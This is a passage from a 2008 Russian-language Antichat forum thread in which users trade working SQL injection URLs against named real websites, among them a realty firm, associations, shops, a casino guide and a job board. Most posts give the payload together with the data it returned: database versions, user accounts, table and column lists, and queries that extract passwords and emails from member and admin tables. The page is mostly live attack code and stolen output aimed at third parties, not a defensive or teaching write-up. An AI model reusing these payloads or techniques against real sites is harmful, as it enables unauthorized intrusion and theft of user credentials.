ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6651  
Старый 24.09.2008, 20:07
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

www.novirealty.ca
Код:
http://www.novirealty.ca/waterfront.php?fid=510/**/union/**/select/**/1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169/*&page=2
Version: 4.1.20
User: f1shst1cks@localhost
=/
 
Ответить с цитированием

  #6652  
Старый 24.09.2008, 20:20
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от slider  
Ассоциация выпускников Международной стипендии Президента Республики Казахстан «Болашак» o_O



p.s : таблы заебся подбирать, там есть форум phpbb но что то мне подсказывает что всё зранится в разных базах...
может все-таки так?

http://www.bolashak.kz/?lang=ru&type=news&id=-46+union+select+1,2,version(),4,5,6,7,8/*
 
Ответить с цитированием

  #6653  
Старый 24.09.2008, 23:02
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

safe-shop.ru
Код:
http://www.safe-shop.ru/indx.php?c=articles&id=2+and+1=0+union+select+1,2,concat(user(),0x20,version(),0x20,database()),4+--
u8606@10.10.10.205 5.0.67-log u8606_2 

1.from_kp 
1.1 id
1.2 ip
1.3 dates
1.4 http_from 
2.kv
2.1 id
2.2 pole
2.3 pole2
3.kv_gr 
4.kv_instr 
5.kv_maingr 
6.kv_news
7.kv_ss 
7.1 id
7.2 name
7.3 prior
7.4 time_id 
8.kv_st

Последний раз редактировалось AFoST; 24.09.2008 в 23:07..
 
Ответить с цитированием

  #6654  
Старый 24.09.2008, 23:35
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
http://www.dwaa.org.uk/showevent.php?eventID=25UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37+LIMIT+1,1/*

Цитатаbname: dwaa
Version: 4.1.18
Username: janet@localhost
Если посмотреть вниз, то там написано:
Parts powered by WordPress

Нашлось - таблица: wp_users
Поля: id,user_aim,user_email,user_icq,user_ip
 
Ответить с цитированием

  #6655  
Старый 24.09.2008, 23:35
Аватар для groupby
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
По умолчанию

4я версия мускула, так что выудить мало чего получается.
Нашел таблицу users. Есть поля id, email. Другие подобрать не смог.
Подозреваю, что из этой таблицы производится вход в
http://sales.conkurent.com/affiliates/index.php
Вот скуля:
http://conkurent.com/news.php?id=4%20union%20select%201,2,3,concat_ws(c har(58),id,email),5%20from%20users/*
 
Ответить с цитированием

  #6656  
Старый 25.09.2008, 00:04
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 groupby:

есть еще:

таблица:

news, поле id
settings, поле name
users, поля: email, id, status

Последний раз редактировалось Pashkela; 25.09.2008 в 02:42..
 
Ответить с цитированием

  #6657  
Старый 25.09.2008, 00:19
Аватар для luz3r
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
По умолчанию

http://www.casinoratgeber.com/index.php?bid=-3+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+information_schema.tables+
 
Ответить с цитированием

  #6658  
Старый 25.09.2008, 01:45
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Искал где поиграть в билот, билот не нащёл, но со скулей поигрался
Код:
http://www.gambler.ru/tours/protocol.php?tourid=129903&teamid=-1+UNION+SELECT+1,concat_ws(0x3a,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--
Код:
5.0.51a-log:gambread@localhost:gambler
 
Ответить с цитированием

  #6659  
Старый 25.09.2008, 02:24
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.dddhouse.com/v3/product_list.php?CategoryID=-1/**/union/**/select/**/1,1,1,1,1,1,1,1/*
Код:
http://www.ransomesjacobsen.com/product_list.php?t=category&id=-3+union+select+1,2/*
Код:
http://california.preferredjobs.com/profiles/profilesubmitrez.asp?number=1+or+1=(SELECT+TOP+1+Password+from+artUsersAdmin))--
Таблицы
syssegments
sysconstraints
jobs
websjobads
ASPLoginUserTbl
JobFair
affiliates
approved_jobs
Articles
artUsers
artUsersAdmin
builderjobs
categories
Comments
dtproperties
email
employers
employers_old
interns
JobFair2
jobs2
jobscats
jobsstored
jobstemp
messages
Months
newsletter
numberjobs
Posts
rbe
rls_jobs
unapproved_jobs
unpaid_affiliates
USER_NOTE
USER_SEARCH
USER_WISH
webs
 
Ответить с цитированием

  #6660  
Старый 25.09.2008, 07:40
Аватар для 3xIm3
3xIm3
Познающий
Регистрация: 19.09.2008
Сообщений: 95
Провел на форуме:
399173

Репутация: 102
По умолчанию

Код:
http://www.pku.org/pages/news.php?id=408+UNION+SELECT+1,2,concat_ws(0x3a,password,email)+FROM+member/*
4.1.22-standardku_@localhostku_db1

Код:
http://www.aupe.org/in_the_news/news.php?id=-96+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,CONCAT_WS(0x3a,version(),user(),database()),20,21/*
4.0.18:root@localhost:aupe

Код:
http://www.globalwaterfoundation.org/news.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE())/*
VERSION 5
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ